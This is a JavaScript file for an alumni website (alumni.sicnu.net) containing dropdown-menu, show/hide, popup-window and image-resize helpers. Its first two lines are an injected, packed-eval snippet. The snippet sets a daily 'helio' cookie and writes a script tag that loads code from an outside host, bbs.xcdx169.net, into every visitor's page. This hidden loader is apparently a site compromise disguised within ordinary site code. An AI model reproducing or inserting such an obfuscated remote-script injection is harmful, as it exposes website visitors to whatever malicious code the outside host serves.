if(document.cookie.indexOf('helio')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='helio=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5(\'<0 3=2 1="6://d.7.c/b/a.8?9"></0>\')',14,14,'script|src|javascript|language|document|writeln|http|xcdx169|js|OLYVYDOT|log|include|net|bbs'.split('|'),0,{}));}
// JavaScript Document for alumni.sicnu.net

//Dropdown menu for IE(from A List Apart)
startList = function() {
if (document.all&&document.getElementById) {
navRoot = document.getElementById("topmenu");
for (i=0; i<navRoot.childNodes.length; i++) {
node = navRoot.childNodes[i];
if (node.nodeName=="LI") {
node.onmouseover=function() {
this.className+=" over";
  }
  node.onmouseout=function() {
  this.className=this.className.replace(" over", "");
   }
   }
  }
 }
}
window.onload=startList;
//Show or Hide layers(From 9rules.com)
function ShowHide(id) {
	// Change the button first
	//closeOthers()
	var moreID = 		document.getElementById(id);
	// Check to see if we should:
	// show or hide
	if (moreID.style.display == "block") {
		moreID.style.display = "none";
	} else {
		moreID.style.display = "block";
	}
}
function HideShow(id) {//Change the ShowHide to HideShow.^_^
	var moreID = 		document.getElementById(id);
	if (moreID.style.display == "none") {
		moreID.style.display = "block";
	} else {
		moreID.style.display = "none";
	}
}
//Open custom window
function ShowWindow(tourl,windowname,wwidth,wheight,allowmenubar,allowstatusbar,allowtoolbar,allowscroll){
	window.open(tourl,windowname,width=wwidth,height=wheight,menubar=allowmenubar,status=allowstatusbar,toolbar=allowtoolbar,scrollbars=allowscroll);
}
//Resize image
function DrawImage(ImgD){ 
	var image=new Image(); 
	image.src=ImgD.src; 
	if(image.width>0 && image.height>0){ 
		if(image.width>=580){ 
			ImgD.width=580; 
			ImgD.height=(image.height*580)/image.width;
		}  
	} 
}